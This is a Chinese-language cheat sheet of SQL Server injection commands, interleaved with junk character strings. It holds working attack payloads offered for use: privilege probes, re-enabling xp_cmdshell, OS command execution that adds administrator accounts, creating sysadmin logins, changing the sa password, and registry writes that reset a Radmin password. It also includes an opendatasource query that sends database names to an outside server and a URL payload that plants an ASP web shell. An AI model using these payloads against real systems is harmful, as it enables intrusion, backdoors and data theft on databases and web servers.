阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
+ U% l8 f2 \1 d/ W& D5 r. M7 O3 A//看看是什么权限的
8 }4 Y0 H0 o! B+ g$ `and 1=(Select IS_MEMBER('db_owner'))
9 ~1 A- A  k, L" Y; Q/ o- AAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

* }' g7 `9 u( W$ C1 k% H. j
数字类型
and char(124)%2Buser%2Bchar(124)=0
- \6 h8 S, X5 r& l( X
字符类型
! J7 q, i8 S; `' and char(124)%2Buser%2Bchar(124)=0 and ''='

5 j, @; b. i  P- U( g/ I! l1 I搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
+ Q9 c( {) n0 |) M( @7 Y# Y5 f
爆用户名
+ R6 E9 ~) w3 y% {& t# V- q: t0 V4 [and user>0
  D( f, `( T+ U  e: ~( }! t/ p' and user>0 and ''='

检测是否为SA权限
* k8 q6 c3 K; Z1 |" Yand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
5 X# \( @+ P6 O7 j# w, @2 s9 _% wAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

; z+ H8 _% ?, {% Y8 |3 A- q检测是不是MSSQL数据库
and exists (select * from sysobjects);--

& {  {5 `, s8 j. h检测是否支持多行
- a8 M% T) n+ Q4 S6 A;declare @d int;--
1 p* {! j; P/ D% O
9 L7 o0 z6 G" e' A  c& W恢复 xp_cmdshell
- v3 g! i8 i2 b5 r  Y) U; u9 D7 U;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

+ j7 ]/ b0 z8 y( Y) d$ v$ a0 \
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
  s$ X- Z% [5 ^7 y
, `8 `: O6 L6 N/ q. Q* v//-----------------------
# a3 k/ L% G# d6 F//      执行命令
//-----------------------
4 x) X: X, S$ n首先开启沙盘模式：
; K0 P* Q# v: ^2 h, ?' S% d$ Vexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

$ ?# k5 `1 [7 @# m然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

+ Q2 z. `, e7 Y! w% X2 @1 f执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

' v0 Q9 b: ~9 H) Y% R, Z8 F判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

+ m1 P9 r  p7 f3 {- q读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
, B$ I. w' o5 O# ~& m
读取目录内容
/ @$ n$ O" e  x/ iexec master..xp_dirtree 'c:\winnt\system32\',1,1
0 B1 e+ B+ v# z. l) G$ w
2 W; B% S! g  z9 Y, c! S- u
$ ^4 h3 v; V" S; B数据库备份
: s9 y* Q1 h8 I. [0 d4 ?backup database pubs to disk = 'c:\123.bak'
/ O: O4 Y3 M- p
//爆出长度
2 T2 [$ ]% D: N. o2 R& ?And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
; g: O' c% N4 v$ X
; `! m) g( |# o/ @; q' k
, i$ X8 e4 U# w( o( I
更改sa口令方法：用sql综合利用工具连接后，执行命令：
: d4 }9 I4 g' Q4 Sexec sp_password NULL,'新密码','sa'
: @4 }# Y2 P5 ]0 Z1 r
添加和删除一个SA权限的用户test：
/ x+ S# K* m0 D+ Mexec master.dbo.sp_addlogin test,ptlove
+ ~/ P* S8 c1 M' b1 e7 F6 Q$ Qexec master.dbo.sp_addsrvrolemember test,sysadmin
/ K) U8 e0 T( ]3 e- b
1 d* k  H# S; T; c9 y+ T删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
, b/ n# k* l% ]' T$ {9 e' E
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public

) _0 K9 _, q5 a7 L8 b( v. E/ G
) Z  t) W1 T+ k3 x5 n停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
6 ]- b- T% B; v9 P  I+ q1 ixp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

, X3 V, z% f" w) U- \. M3 X$ fdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
  E# J% t$ D1 r* I2 |# d所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
# F4 Y3 p3 {% A2 A0 M8 D'C:\Inetpub\wwwroot\SQLInject\login.asp',
9 }5 A$ A9 L& }, x'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
3 b2 z- d6 j2 [0 N' F' h$ V! ?, N
xp_terminate_process
4 @0 b; s  d. V2 X6 H. Z! C2 D
停掉某个执行中的程序，但赋予的参数是 Process ID。
& Q9 r+ ]* z4 k0 d4 c" n利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484
- C% A: I$ a2 c! Z
7 D# x( y' A/ u2 g! F7 o& Cxp_unpackcab
5 V. v2 T" y2 b# a
7 s2 M) ]6 u5 e1 c8 o解开压缩档。
) C2 d' u, t; f; ~) u2 Z4 ?, I: `; L
xp_unpackcab 'c:\test.cab','c:\temp',1
" h* o3 F  q" ]1 C7 e  {; V: N

2 L& ]5 j: }$ S: t某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% U! {4 g$ a% q( n. i* v- M! G$ H
9 w/ v* k: j$ u6 k2 T1 t! ccreate database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
5 I& U; ?7 [& C8 ^3 F; @
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

/ y: \! O2 R5 Q( T) V: L
//在Master中创建表，看看权限怎样
! `+ r% ^  p+ x5 @/ I3 B7 ECreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
* `1 c7 b! ^6 Q3 ~8 J5 N& D' Q) [  {http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
' K+ v: I$ q, A9 P' jUpdate films SET kind = 'Dramatic' Where id = 123

7 |( {# G( r& c# A//删除内容
delete from table_name where Stockid = 3